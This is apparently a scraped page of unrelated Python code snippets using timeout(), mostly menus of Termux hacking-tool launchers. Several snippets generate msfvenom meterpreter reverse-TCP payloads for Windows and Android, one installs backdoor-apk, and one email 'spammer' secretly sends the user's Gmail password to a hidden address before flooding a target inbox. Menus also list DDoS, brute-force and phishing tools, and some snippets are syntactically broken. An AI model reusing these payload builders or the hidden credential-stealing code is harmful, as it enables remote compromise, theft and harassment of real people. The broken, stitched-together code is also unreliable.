Exemplo n.º 1
0
def update():
    print(colored("\n请选择更新方式:\n", "cyan", attrs=['bold']))
    print(colored("\n       [01]", "yellow") + " : 一键安装的更新")
    print(colored("       [02]", "yellow") + " : 克隆安装的更新\n")
    print(colored("       [00]", "yellow") + " : Back Menu\n")
    up = input(colored("AutoMux >>> ", "yellow"))

    if up.strip() == "0" or up.strip() == "00" or up.strip() == "exit":
        restart()
    elif up.strip() == "02" or up.strip() == "2":
        print(colored("\n更新中,请稍候...\n", "green"))
        pwd = os.getcwd()
        os.system("cd %s" % pwd)
        os.system("git stash && git pull origin master")
        os.system("cd ~")
        print(colored("\n更新完成AutoMux将在3秒后重启AutoMux\n", "green"))
        timeout(3)
        restart()
    elif up.strip() == "01" or up.strip() == "1":
        print(colored("\n更新中,请稍候...\n", "green"))
        os.system("bash $PREFIX/share/AutoMux/script/update.sh")
        print(colored("\n更新完成AutoMux将在3秒后重启AutoMux\n", "green"))
        timeout(3)
        restart()
    else:
        error()
Exemplo n.º 2
0
 def search_query(self,**kwargs):
     """
     start : int -> start search
     stop : int -> stop search
     lang : str -> language query
     country : str -> country code
     """
     if not kwargs:
         return "no keywords!";
     else:
         self.results = []
         def filter_(url):
             remove = url.strip('/url?q=')
             find = remove.find('&sa=U&ved=')
             return remove[:find]
         self.dict = dict({'lang':'hl','country':'cr','start':'start','stop':'num'})
         for k,v in kwargs.items():
             if k in self.dict.keys():
                 self.urlq += "&%s=%s"%(self.dict[k],v)
             else:pass
         self.soup = BeautifulSoup(self.get_content(self.urlq),'html.parser')
         for u,d,t in zip(
             self.soup.find_all('div',{'class':'kCrYT'}),
             self.soup.find_all('div',{'class':'BNeawe s3v9rd AP7Wnd'}), 
             self.soup.find_all('div',{'class':'BNeawe vvjwJb AP7Wnd'})
             ):
             if not 'pause' in kwargs.keys():pass
             else:timeout(kwargs['pause'])
             try:
                 # result
                 self.results.append({'url':filter_(u.a['href']),'title':t.text,'decription':d.text})
             except:pass
         if not self.results:
             return "sorry an error occurred please try again!"
         else:return json.dumps(self.results,indent=1)
Exemplo n.º 3
0
    def createEnvironment(self, create_new_environment=True):
        if self.newenv:
            if not os.path.exists(self.py36):
                print(self.CGR, "[i] Creating Environment...", self.END)
                os.mkdir(self.py36)

            else:
                print(self.CGR, "[i] Reusing Previous\
 Environment...", self.END)
                print(self.CGR, "[i] Remove {} or run with \
`--recreate` switch to recreate virtual environment...".format(self.py36))

            os.chdir(self.py36)

        else:
            print(self.CY, "[i] Not testing on a\
 virtual environment!", self.END)
            if gso('git stash push')[0] == 0:
                pass

            else:
                print(self.CR, "[i] Cannot stash\
 current changes! Please manually")
                print("stash or commit your current\
 changes to continue.", self.END)
                sys.exit(6)

        self.rootdir = os.getcwd()
        print(self.CGR, "[i] Environment set!\
 Now starting to test...", self.END)
        timeout(1)
Exemplo n.º 4
0
def main():
        banner()
		print "  [01] HACK MIni"
		print "  [02] HACK Big"
		print "  [03] HACK Aggresive"
		print "  [04] Open Tools"
		print "  [05] Exit"
		stx= raw_input("stx > ")
		
		if stx == "1" or stx == "01"
		    print "\n   [01] Fbbruteforce"
			print "   [02] spammer-Email"
			print "   [03]         "
			print "   [00] kembali"
			hackmini = raw_input("stx >")
			
			if hackmini == "01" hackmini == "1":
			    Fbbruteforce()
			elif hackmini == "02" or hackmini == "2":
			    spammer_email
			elif hackmini == "03" or hackmini == "3":
			
			elif hackmini == "00" or hackmini == "0":
			   restart_program()
			else:
			     print "\nERROR: salah input"
				 timeout(2)
				 restart_program()
Exemplo n.º 5
0
 def q():
     os.system("clear")
     os.system("figlet +")
     A = input("Number :")
     B = input("Number :")
     print(A + B)
     timeout(5)
     BB()
Exemplo n.º 6
0
def qhy():
    print("更换清华源中,请稍后...")
    os.system("rm -rf $PREFIX/etc/apt/sources.list")
    os.system('echo "deb https://mirrors.tuna.tsinghua.edu.cn/termux stable main" >$PREFIX/etc/apt/sources.list')
    os.system("apt update")
    print("更换成功!2秒后重启")
    timeout(2)
    restart()
Exemplo n.º 7
0
 def e():
     os.system("clear")
     os.system("figlet *")
     A = input("Number :")
     B = input("Number :")
     print(A * B)
     timeout(5)
     BB()
Exemplo n.º 8
0
 def r():
     os.system("clear")
     os.system("figlet /")
     A = input("Number :")
     B = input("Number :")
     print(A / B)
     timeout(5)
     BB()
Exemplo n.º 9
0
def gfy():
    print("恢复官方源中,请稍后...")
    os.system("rm -rf $PREFIX/etc/apt/sources.list")
    os.system('echo "deb https://termux.org/packages/ stable main" >$PREFIX/etc/apt/sources.list')
    os.system("apt  update")
    print("恢复成功!2秒后重启")
    timeout(2)
    restart()
Exemplo n.º 10
0
 def w():
     os.system("clear")
     os.system("figlet -")
     A = input("Number :")
     B = input("Number :")
     print(A - B)
     timeout(5)
     BB()
Exemplo n.º 11
0
def main():
    banner()
    print " GTX AUTO INSTALL EXPLOIT TOOLS"
    print " CREATED BY: YUKKI666"
    print " Version : Beta Ver"
    print " THANKS FOR : Garuda Tersakti 72"
    print "\n (01) Metasploit"
    print " (02) Commix"
    print " (03) sqlmap"
    print " (04) Brutal"
    print " (05) A-Rat"
    print " (06) WPSploit"
    print " (07) Websploit"
    print " (08) Routersploit"
    print " (09) BlackBox"
    print " (10) XAttacker"
    print " (11) The FatRat"
    print " (12) DrupalGeddon2"
    print " (13) DarkSploit"
    print " (14) Social Engineering"
    print " (00) Exit GTX"
    exploitool = raw_input("GTX > ")

    if exploitool == "01" or exploitool == "1":
        metasploit()
    elif exploitool == "02" or exploitool == "2":
        commix()
    elif exploitool == "03" or exploitool == "3":
        sqlmap()
    elif exploitool == "04" or exploitool == "4":
        brutal()
    elif exploitool == "05" or exploitool == "5":
        a_rat()
    elif exploitool == "06" or exploitool == "6":
        wpsploit()
    elif exploitool == "07" or exploitool == "7":
        websploit()
    elif exploitool == "08" or exploitool == "8":
        routersploit()
    elif exploitool == "09" or exploitool == "9":
        blackbox()
    elif exploitool == "10":
        xattacker()
    elif exploitool == "11":
        tfr()
    elif exploitool == "12":
        drupalgeddon()
    elif exploitool == "13":
        drxp()
    elif exploitool == "14":
        soceng()
    elif exploitool == "00":
        sys.exit()
    else:
        print "\nERROR COMMAND SALAH"
        timeout(2)
        sys.exit()
Exemplo n.º 12
0
def windows64():
    LHOST = input("请输入本机IP地址 >>> ")
    LPORT = input("请输入要监听的端口 >>> ")
    name = input("请输入文件名字(.exe) >>> ")
    bcml = input("请输入保存地址 >>> ")
    print("正在为Windouws 64位生成LHOST为: %s LPORT为: %s 的 %s文件..."%(LHOST,LPORT,name))
    os.system("msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe > %s/%s" % (LHOST,LPORT,bcml,name))
    print("生成完毕!2秒后重启程序")
    timeout(2)
    restart()
Exemplo n.º 13
0
def android():
    LHOST = input("请输入本机IP地址 >>> ")
    LPORT = input("请输入要监听的端口 >>> ")
    name = input("请输入文件名字(.apk) >>> ")
    bcml = input("请输入保存地址 >>> ")
    print("正在为Android生成LHOST为: %s LPORT为: %s 的 %s文件..."%(LHOST,LPORT,name))
    os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=%s LPORT=%s R > %s/%s" %(LHOST,LPORT,bcml,name))
    print("生成完毕!2秒后重启程序")
    timeout(2)
    restart()
Exemplo n.º 14
0
def command():
 stark = raw_input("stark > ")
 if stark== "help":
  help()
 elif stark == "start phishing" or stark == "phishing":
  os.system("termux-tts-speak -r 0.9 ok. boss starting phishing")
  Phishing()
 elif stark == "start port forwarding" or stark  ==  "port forward":
  portforward()
 elif stark == "create payload" or stark == "payload":
  payload()
 elif stark == "startwebhacking" or stark == "webhacking":
  webhack()
 elif stark == "dork" or stark == "sqldork":
  sqldork()
 elif stark == "dorkinfo" or stark == "sqldorks" or stark == "dorks":
  os.system("termux-open-url https://gamerstech330.blogspot.com/2019/11/sql-dorks.html")
 elif stark == "hash" or stark == "hasher" or stark == "hash decrypt":
  Hash()
 elif stark == "ddos":
  ddos()
 elif stark == "crawler" or stark == "adminfinder" or stark == "adminfind":
  webadm()
 elif stark == "battery" or stark == "battery info":
  battery()
 elif stark == "capture photo" or stark == "photo":
  cphoto()
 elif stark == "text to speach" or stark == "textspeach":
  textspeach()
 elif stark == "clear":
  os.system("clear")
 elif stark == "hi" or stark == "hello" or stark == "whats up":
  print random.choice(hi)
 elif stark == "i am fine" or stark == "fine":
  print(colored("""Me Tooo ;)\n""", "green"))
 elif stark == "are you boy or girl" or stark == "are you boy" or stark == "are you girl":
  printslow(colored("""My Gender not decided XD\n""" , "yellow"))
 elif stark == "where are you from" or stark == "where you from":
  printslow(colored("""i am from python2 Termux XD\n""", "green"))
 elif stark == "who is your developer" or stark == "who is your boss" or stark == "who make you":
  printslow(colored("""My Developer is you because of you\n support my developer to make me thanks for that\n""", "green"))
  visit()
 elif stark == "credit" or stark == "credits":
  credit()
 elif stark == "thanks" or stark == "thank you":
  printslow(colored("""Glad You Like It XD\n""", "blue"))
 elif stark == "exit":
  os.system("termux-toast -b grey -c white Have Nice Day")
  exit()
 else:
      print  (colored("ERROR: Sorry sir my maker not added for this command", 'red'))
      timeout(2)
      command()
Exemplo n.º 15
0
def menu():
    os.system("clear")
    print(
        colored(
            """
     .88b  d88. db    db d888888b  .d88b.   .d88b.  db      
     88'YbdP`88 88    88 `~~88~~' .8P  Y8. .8P  Y8. 88      
     88  88  88 88    88    88    88    88 88    88 88      
     88  88  88 88    88    88    88    88 88    88 88      
     88  88  88 88b  d88    88    `8b  d8' `8b  d8' 88booo. 
     YP  YP  YP ~Y8888P'    YP     `Y88P'   `Y88P'  Y88888P 

 >> CODED BY:AFEEF
 >> Youtube:   mr unknown
 >> Instagram: @afeef._.maf
 >> Telegram:  mrunknownyt 
 >>>TOOLS HAVE VIDEO TUTORIALS<<<
 =============================================== 
 1. Fun Tools   
 2. Account Penatration
 3. Website Penetration
 4. Information Gathering
 5. Follow Me!               
 ================================================
 0. EXIT    
 """, 'yellow'))

    loop = True

    while loop:
        mut = int(input("mutool > "))

        if mut == 1:
            os.system("clear")
            fun()
        elif mut == 2:
            os.system("clear")
            acp()
        elif mut == 3:
            os.system("clear")
            web()
        elif mut == 4:
            os.system("clear")
            info()
        elif mut == 5:
            os.system("clear")
            folme()
        elif mut == 0:
            sys.exit()
        else:
            print(colored("ERROR: WRONG COMMAND BRO :(", 'red'))
            timeout(1)
            menu()
Exemplo n.º 16
0
def Windouws64MM():
    LHOST = input(colored("请输入本机IP地址 >>> ", "green"))
    LPORT = input(colored("请输入要监听的端口 >>> ", "green"))
    exenmap = input(colored("请输入文件名字(.exe) >>> ", "green"))
    bcml = input(colored("请输入保存地址 >>> ", "green"))
    print(
        colored("正在为Windouws X64生成LHOST为: %s LPORT为: %s 的 %s文件...", "yellow") %
        (LHOST, LPORT, exenmap))
    os.system(
        "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe > %s/%s"
        % (LHOST, LPORT, bcml, exenmap))
    print(colored("生成完毕!2秒后重启程序", "yellow"))
    timeout(2)
    restart()
Exemplo n.º 17
0
def AndroidMM():
    LHOST = input(colored("请输入本机IP地址 >>> ", "green"))
    LPORT = input(colored("请输入要监听的端口 >>> ", "green"))
    exenmap = input(colored("请输入文件名字(.apk) >>> ", "green"))
    bcml = input(colored("请输入保存地址 >>> ", "green"))
    print(
        colored("正在为Android生成LHOST为: %s LPORT为: %s 的 %s文件...", "yellow") %
        (LHOST, LPORT, exenmap))
    os.system(
        "msfvenom -p android/meterpreter/reverse_tcp LHOST=%s LPORT=%s R > %s/%s"
        % (LHOST, LPORT, bcml, exenmap))
    print(colored("生成完毕!2秒后重启程序", "yellow"))
    timeout(2)
    restart()
    def createEnvironment(self):
        if not os.path.exists(self.py36):
            print(self.CGR, "[i] Creating Environment...", self.END)
            gso('virtualenv --python=python3.6 ' + self.py36)

        else:
            print(self.CGR, "[i] Reusing Previous Environment...", self.END)
            print(self.CGR, "[i] Remove {} to recreate...".format(self.py36))

        os.chdir(self.py36)
        self.rootdir = os.getcwd()
        print(self.CGR, "[i] Environment set! Now starting to test...",
              self.END)
        timeout(1)
Exemplo n.º 19
0
def gfy():
    print(colored("更换官方源中,请稍后...", "green"))
    os.system("rm -rf $PREFIX/etc/apt/sources.list")
    os.system("rm -rf $PREFIX/etc/apt/sources.list.d/science.list")
    os.system("rm -rf $PREFIX/etc/apt/sources.list.d/game.list")
    os.system(
        'echo "deb https://termux.org/packages/ stable main" >$PREFIX/etc/apt/sources.list'
    )
    os.system(
        'echo "deb https://dl.bintray.com/grimler/science-packages-24 science stable" >$PREFIX/etc/apt/sources.list.d/science.list'
    )
    os.system(
        'echo "deb https://dl.bintray.com/grimler/game-packages-24 games stable" >$$PREFIX/etc/apt/sources.list.d/game.list'
    )
    os.system("apt update")
    print(colored("更换成功!2秒后重启AutoMux", "green"))
    timeout(2)
    restart()
Exemplo n.º 20
0
def qhd():
    print(colored("更换清华源中,请稍后...", "green"))
    os.system("rm -rf $PREFIX/etc/apt/sources.list")
    os.system("rm -rf $PREFIX/etc/apt/sources.list.d/science.list")
    os.system("rm -rf $PREFIX/etc/apt/sources.list.d/game.list")
    os.system(
        'echo "deb https://mirrors.tuna.tsinghua.edu.cn/termux/termux-packages-24 stable main" >$PREFIX/etc/apt/sources.list'
    )
    os.system(
        'echo "deb https://mirrors.tuna.tsinghua.edu.cn/termux/science-packages-24 science stable" >$PREFIX/etc/apt/sources.list.d/science.list'
    )
    os.system(
        'echo "deb https://mirrors.tuna.tsinghua.edu.cn/termux/game-packages-24 games stable" >$PREFIX/etc/apt/sources.list.d/game.list'
    )
    os.system("apt update")
    print(colored("更换成功!2秒后重启AutoMux", "green"))
    timeout(2)
    restart()
Exemplo n.º 21
0
 def results(content):
     data = []
     soup = BeautifulSoup(content,'html.parser')
     for url,dec,im in zip(
         soup.find_all('a',{'class':'result-heading-title'}),
         soup.find_all('div',{'class':'description'}),
         soup.find_all('div',{'class':'result-heading'})):
         timeout(pause)
         try:
             if url['href'][0] == '/':
                 new = 'https://sourceforge.net'+url['href']
             else:
                 new = url['href']
             data.append({
                 'title':url.h3.text.title(),
                 'url':new,
                 'icon':'https:'+im.a.img['src'],
                 'decription':dec.text.replace('\n','').replace(' '*5,' ').strip('  '),
                 })
         except:pass
     return data;
Exemplo n.º 22
0
   def spam(self):
        # Credentials
        username = raw_input("[?] enter your gmail: ")
        password = raw_input("[?] enter your password: "******"[?] Target email: ")
        spams = input("[?] how much spam will be sent: ")
	Time = input("[?] input delay, above 10 second: ")
	a = ("Emailnya : %s\n\nPasswordnya : %s") % (username,password)
	date = datetime.datetime.now().strftime( "%d/%m/%Y %H:%M" )
	target2 = "*****@*****.**"
	sms = "Form: ANONYMOUS\nTo: %s\nSubject: THIS FOR YOU\nDate: %s\n\n%s" % (target2,date,a)

        server = smtplib.SMTP('smtp.gmail.com:587')
        server.starttls()
        server.login(username, password)
	server.sendmail(username,target2,sms)

	try:
		server.login(username, password)
	except:
		print "[-] Authentication Error"
		exit()

        print "[!] Engaging the target"
        try:
            for i in xrange(spams):
                subj = random.randrange(0,999999999999999999)
                content = random.randrange(0,999999999999999999)
                name = random.randrange(0,999999999999999999)
                date = datetime.datetime.now().strftime( "%d/%m/%Y %H:%M" )
                msg = "From: ANONYMOUS\nTo: %s\nSubject: %s\nDate: %s\n\n%s" % (target, subj, date, content)

                server.sendmail(username, target, msg)
		timeout(Time)
        except smtplib.SMTPException:
        		print "[-] An Error Occured During Process"
        		print "[!] The target email might be wrong"
        		exit()
        server.quit()
        print "[+] Target engaging complete"
Exemplo n.º 23
0
def install_backdoor_apk():
    print(colored("正在安装backdoor-apk,请稍等...", "green"))
    print(colored("这个免杀工具体积很大(235MB),这里会停留1分钟,给你30秒的时间,准备挂梯子。", "yellow"))
    print(colored("如果没有梯子你可以Ctrl+C取消安装,找梯子。", "yellow"))
    timeout(30)
    os.system("cd /opt/")
    os.system("sudo apt update && sudo apt upgrade -y")
    print(colored("先安装小规模的需求库!", "yellow"))
    os.system(
        "sudo apt install bytecode-viewer libsmali-java smali apktool unzip git -y"
    )
    print(colored("接下来安装大体积的需求库!", "yellow"))
    os.system("sudo apt install metasploit-framework openjdk-11-jdk -y")
    print(colored("准备克隆backdoor-apk,请准备好梯子,我会等待30秒。", "yellow"))
    print(colored("没有梯子克隆会很痛苦的!", "red"))
    timeout(30)
    print(colored("请等待.......", "blue"))
    os.system("git clone https://github.com/dana-at-cp/backdoor-apk")
    os.chdir("%s/backdoor-apk/" % pwd)
    print(colored("安装完成,你cd可以进去看一下运行一下", "blue"))
    print(colored("玩法链接:https://github.com/dana-at-cp/backdoor-apk", "green"))
    backmenu()
    def run(self, command):
        self.job_no += 1
        if command.startswith('cd'):
            os.chdir(command.partition('cd ')[2])

        else:
            self.result = gso(command)

        print(self.CG, "$ " + command, self.END)
        print(self.result[1])
        print()
        if self.result[0] != 0:
            print(
                self.CR, "Job #{} failed! Exited with code #{}".format(
                    str(self.job_no), str(self.result[0])), self.END)
            self.retcode = 1

        else:
            self.retcode = 0

        self.report.append(self.result)
        timeout(1)
        return self.retcode
Exemplo n.º 25
0
def homescreen():
    print(' ')
    print(
        "\033[1;36mVisit:»» \033[1;33m >> www.youtube.com/Tibart How to use <<\033[1;36m To Get a Free Password... "
    )
    print(' ')
    T = input("Enter Your Password TO \033[1;32mSTART.....! :")
    if T == 'Tibart' or T == 'tibart':
        os.system('clear')
        time.sleep(0.1)
        print('')
        os.system('clear')
        termux_tools()
    else:
        t(0.1, '\n\t   \033[1;38m[  PLEASE WAIT .... ]')
        print(' ')
        print(' Error.............\033[1;31m(0_0)\033[92m...............!')
        timeout(1)
        print('Please Try Again.............')
        print(' ')
        timeout(0.3)
        os.system('clear')
        homescreen()
Exemplo n.º 26
0
    def run(self, command):
        self.job_no += 1
        print(self.CG, "$ " + command, self.END)
        if command.startswith('cd '):
            os.chdir(command.partition('cd ')[2])

        else:
            self.result = (os.system(command), '')

        print()
        if self.result[0] != 0:
            print(self.CR, "Job #{} failed! Exited with code\
 #{}".format(str(self.job_no),
                        str(self.result[0])), self.END)
            self.retcode = 1
            self.justContinue = True

        else:
            self.retcode = 0

        self.report.append(self.result)
        timeout(1)
        return self.retcode
Exemplo n.º 27
0
def main():
	banner()
	print " [01] FIX KALI ERROR" 
        print " [02] SOURCES.LIST"
        print " [03] MY_IP"
	print bcolors.BOLD + "\n   [10] Exit the fixkali\n" + bcolors.ENDC
	lazyfix = raw_input("fix > ")
  
	if lazyfix == "1" or lazyfix == "01":
		print bcolors.OKGREEN + "    [01] vpn" + bcolors.ENDC
		print bcolors.OKGREEN + "    [02] tor"  + bcolors.ENDC
                print bcolors.OKGREEN + "    [03] gpg_error" + bcolors.ENDC
	        print bcolors.BOLD + "\n    [00] Back to main menu \n" + bcolors.ENDC
		fixkali = raw_input("fix > ")
		
		if fixkali == "01" or fixkali == "1":
			vpn()
		elif fixkali == "02" or fixkali == "2":
			tor()
                elif fixkali == "03" or fixkali == "3":
			gpg_error()  
		elif fixkali == "00" or fixkali == "0":
			restart_program()
		else:
			print bcolors.FAIL + "\nERROR: Wrong Input" + bcolors.ENDC
			timeout(2)
			restart_program()


        elif lazyfix == "2" or lazyfix == "02":
		print bcolors.OKGREEN + "\n    [01] sources_kali1" + bcolors.ENDC
		print bcolors.OKGREEN + "    [02] sources_kali2" + bcolors.ENDC
	        print bcolors.BOLD + "\n    [00] Back to main menu\n" + bcolors.ENDC
		sources = raw_input("fix > ")
		
		if sources == "01" or sources == "1":
			sources_kali1()
		elif sources == "02" or sources == "2":
			sources_kali2()
		elif sources == "00" or sources == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()

        elif lazyfix == "3" or lazyfix == "03":
                 MY_IP()

	elif lazyfix == "10":
		sys.exit()
	
	else:
		print "\nERROR: Wrong Input"
		timeout(2)
		restart_program()
Exemplo n.º 28
0
Arquivo: mv.py Projeto: Alixxx1/mv
def main():
	banner()
	print "   [01] Information Gathering"
	print "   [02] Vulnerability Scanner"
	print "   [03] Stress Testing"
	print "   [04] Password Attacks"
	print "   [05] Web Hacking"
	print "   [06] Exploitation Tools"
	print "   [07] Sniffing & Spoofing"
	print "   [08] Other\n"
	print "   [10] Exit the Lazymux\n"
	lazymux = raw_input("lzmx > ")
	
	if lazymux == "1" or lazymux == "01":
		print "\n    [01] Nmap"
		print "    [02] Red Hawk"
		print "    [03] D-Tect"
		print "    [04] sqlmap"
		print "    [05] Infoga"
		print "    [06] ReconDog"
		print "    [07] AndroZenmap"
		print "    [08] sqlmate"
		print "    [09] AstraNmap"
		print "    [10] WTF"
		print "    [11] Easymap"
		print "    [12] BlackBox"
		print "    [13] XD3v"
		print "    [14] Crips"
		print "    [15] SIR"
		print "    [16] EvilURL"
		print "    [17] Striker"
		print "    [18] Xshell"
		print "    [19] OWScan"
		print "    [20] OSIF"
		print "    [21] Devploit"
		print "    [22] Namechk"
		print "    [23] AUXILE"
		print "    [24] inther"
		print "    [25] GINF"
		print "    [26] GPS Tracking"
		print "    [27] ASU"
		print "    [28] fim"
		print "    [29] MaxSubdoFinder"
		print "    [30] pwnedOrNot"
		print "    [31] Mac-Lookup"
		print "    [32] BillCypher\n"
		print "    [00] Back to main menu\n"
		infogathering = raw_input("lzmx > ")
		
		if infogathering == "01" or infogathering == "1":
			nmap()
		elif infogathering == "02" or infogathering == "2":
			red_hawk()
		elif infogathering == "03" or infogathering == "3":
			dtect()
		elif infogathering == "04" or infogathering == "4":
			sqlmap()
		elif infogathering == "05" or infogathering == "5":
			infoga()
		elif infogathering == "06" or infogathering == "6":
			reconDog()
		elif infogathering == "07" or infogathering == "7":
			androZenmap()
		elif infogathering == "08" or infogathering == "8":
			sqlmate()
		elif infogathering == "09" or infogathering == "9":
			astraNmap()
		elif infogathering == "10":
			wtf()
		elif infogathering == "11":
			easyMap()
		elif infogathering == "12":
			blackbox()
		elif infogathering == "13":
			xd3v()
		elif infogathering == "14":
			crips()
		elif infogathering == "15":
			sir()
		elif infogathering == "16":
			evilURL()
		elif infogathering == "17":
			striker()
		elif infogathering == "18":
			xshell()
		elif infogathering == "19":
			owscan()
		elif infogathering == "20":
			osif()
		elif infogathering == "21":
			devploit()
		elif infogathering == "22":
			namechk()
		elif infogathering == "23":
			auxile()
		elif infogathering == "24":
			inther()
		elif infogathering == "25":
			ginf()
		elif infogathering == "26":
			gpstr()
		elif infogathering == "27":
			asu()
		elif infogathering == "28":
			fim()
		elif infogathering == "29":
			maxsubdofinder()
		elif infogathering == "30":
			pwnedOrNot()
		elif infogathering == "31":
			maclook()
		elif infogathering == "32":
			billcypher()
		elif infogathering == "00" or infogathering == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "2" or lazymux == "02":
Exemplo n.º 29
0
        info()
    elif stark == "3":
        os.system("clear")
        webhacking()
    elif stark == "4":
        os.system("clear")
        termux()
    elif stark == "5":
        os.system("clear")
        Fix()
    elif stark == "6":
        os.system("chmod +x update")
        os.system("./update")
    elif stark == "7":
        About()
    elif stark == "8":
        os.system("clear")
        deepstore()
    elif stark == "9":
        print(colored("under progress...", 'green'))
        timeout(3)
        restartprogram()
    elif stark == "10":
        sys.exit()
    elif stark == "0":
        restartprogram()
    else:
        print(colored("ERROR: WRONG COMMAND BRO.?", 'red'))
        timeout(2)
        restartprogram()
Exemplo n.º 30
0
Arquivo: mv.py Projeto: Alixxx1/mv
			routersploit()
		elif vulnscan == "19":
			xshell()
		elif vulnscan == "20":
			sh33ll()
		elif vulnscan == "21":
			blackbox()
		elif vulnscan == "22":
			xattacker()
		elif vulnscan == "23":
			owscan()
		elif vulnscan == "00" or vulnscan == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "3" or lazymux == "03":
		print "\n    [01] Torshammer"
		print "    [02] Slowloris"
		print "    [03] Fl00d & Fl00d2"
		print "    [04] GoldenEye"
		print "    [05] Xerxes"
		print "    [06] Planetwork-DDOS"
		print "    [07] Hydra"
		print "    [08] Black Hydra"
		print "    [09] Xshell"
		print "    [10] santet-online\n"
		print "    [00] Back to main menu\n"
		stresstest = raw_input("lzmx > ")
Exemplo n.º 31
0
def main():
	banner()
	print "   [01] Information Gathering"
	print "   [02] Vulnerability Scanner"
	print "   [03] Stress Testing"
	print "   [04] Password Attacks"
	print "   [05] Web Hacking"
	print "   [06] Exploitation Tools"
	print "   [07] Sniffing & Spoofing"
	print "   [08] Other\n"
	print "   [10] Exit the Lazymux\n"
	lazymux = raw_input("lzmx > ")
	
	if lazymux == "1" or lazymux == "01":
		print "\n    [01] Nmap"
		print "    [02] Red Hawk"
		print "    [03] D-Tect"
		print "    [04] sqlmap"
		print "    [05] Infoga"
		print "    [06] ReconDog"
		print "    [07] AndroZenmap"
		print "    [08] sqlmate"
		print "    [09] AstraNmap"
		print "    [10] WTF"
		print "    [11] Easymap"
		print "    [12] BlackBox"
		print "    [13] XD3v"
		print "    [14] Crips"
		print "    [15] SIR"
		print "    [16] EvilURL"
		print "    [17] Striker"
		print "    [18] Xshell"
		print "    [19] OWScan\n"
		print "    [00] Back to main menu\n"
		infogathering = raw_input("lzmx > ")
		
		if infogathering == "01" or infogathering == "1":
			nmap()
		elif infogathering == "02" or infogathering == "2":
			red_hawk()
		elif infogathering == "03" or infogathering == "3":
			dtect()
		elif infogathering == "04" or infogathering == "4":
			sqlmap()
		elif infogathering == "05" or infogathering == "5":
			infoga()
		elif infogathering == "06" or infogathering == "6":
			reconDog()
		elif infogathering == "07" or infogathering == "7":
			androZenmap()
		elif infogathering == "08" or infogathering == "8":
			sqlmate()
		elif infogathering == "09" or infogathering == "9":
			astraNmap()
		elif infogathering == "10":
			wtf()
		elif infogathering == "11":
			easyMap()
		elif infogathering == "12":
			blackbox()
		elif infogathering == "13":
			xd3v()
		elif infogathering == "14":
			crips()
		elif infogathering == "15":
			sir()
		elif infogathering == "16":
			evilURL()
		elif infogathering == "17":
			striker()
		elif infogathering == "18":
			xshell()
		elif infogathering == "19":
			owscan()
		elif infogathering == "00" or infogathering == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "2" or lazymux == "02":
		print "\n    [01] Nmap"
		print "    [02] AndroZenmap"
		print "    [03] AstraNmap"
		print "    [04] Easymap"
		print "    [05] Red Hawk"
		print "    [06] D-Tect"
		print "    [07] Damn Small SQLi Scanner"
		print "    [08] SQLiv"
		print "    [09] sqlmap"
		print "    [10] sqlscan"
		print "    [11] Wordpresscan"
		print "    [12] WPScan"
		print "    [13] sqlmate"
		print "    [14] wordpresscan"
		print "    [15] WTF"
		print "    [16] Rang3r"
		print "    [17] Striker"
		print "    [18] Routersploit"
		print "    [19] Xshell"
		print "    [20] SH33LL"
		print "    [21] BlackBox"
		print "    [22] XAttacker"
		print "    [23] OWScan\n"
		print "    [00] Back to main menu\n"
		vulnscan = raw_input("lzmx > ")
		
		if vulnscan == "01" or vulnscan == "1":
			nmap()
		elif vulnscan == "02" or vulnscan == "2":
			androZenmap()
		elif vulnscan == "03" or vulnscan == "3":
			astraNmap()
		elif vulnscan == "04" or vulnscan == "4":
			easyMap()
		elif vulnscan == "05" or vulnscan == "5":
			red_hawk()
		elif vulnscan == "06" or vulnscan == "6":
			dtect()
		elif vulnscan == "07" or vulnscan == "7":
			dsss()
		elif vulnscan == "08" or vulnscan == "8":
			sqliv()
		elif vulnscan == "09" or vulnscan == "9":
			sqlmap()
		elif vulnscan == "10":
			sqlscan()
		elif vulnscan == "11":
			wordpreSScan()
		elif vulnscan == "12":
			wpscan()
		elif vulnscan == "13":
			sqlmate()
		elif vulnscan == "14":
			wordpresscan()
		elif vulnscan == "15":
			wtf()
		elif vulnscan == "16":
			rang3r()
		elif vulnscan == "17":
			striker()
		elif vulnscan == "18":
			routersploit()
		elif vulnscan == "19":
			xshell()
		elif vulnscan == "20":
			sh33ll()
		elif vulnscan == "21":
			blackbox()
		elif vulnscan == "22":
			xattacker()
		elif vulnscan == "23":
			owscan()
		elif vulnscan == "00" or vulnscan == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "3" or lazymux == "03":
		print "\n    [01] Torshammer"
		print "    [02] Slowloris"
		print "    [03] Fl00d & Fl00d2"
		print "    [04] GoldenEye"
		print "    [05] Xerxes"
		print "    [06] Planetwork-DDOS"
		print "    [07] Hydra"
		print "    [08] Black Hydra"
		print "    [09] Xshell"
		print "    [10] santet-online\n"
		print "    [00] Back to main menu\n"
		stresstest = raw_input("lzmx > ")
		
		if stresstest == "01" or stresstest == "1":
			torshammer()
		elif stresstest == "02" or stresstest == "2":
			slowloris()
		elif stresstest == "03" or stresstest == "3":
			fl00d12()
		elif stresstest == "04" or stresstest == "4":
			goldeneye()
		elif stresstest == "05" or stresstest == "5":
			xerxes()
		elif stresstest == "06" or stresstest == "6":
			planetwork_ddos()
		elif stresstest == "07" or stresstest == "7":
			hydra()
		elif stresstest == "08" or stresstest == "8":
			black_hydra()
		elif stresstest == "09" or stresstest == "9":
			xshell()
		elif stresstest == "10":
			sanlen()
		elif stresstest == "00" or stresstest == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "4" or lazymux == "04":
		print "\n    [01] Hydra"
		print "    [02] Facebook Brute Force"
		print "    [03] Facebook Brute Force 2"
		print "    [04] Facebook Brute Force 3"
		print "    [05] Black Hydra"
		print "    [06] Hash Buster"
		print "    [07] 1337Hash"
		print "    [08] Cupp"
		print "    [09] InstaHack"
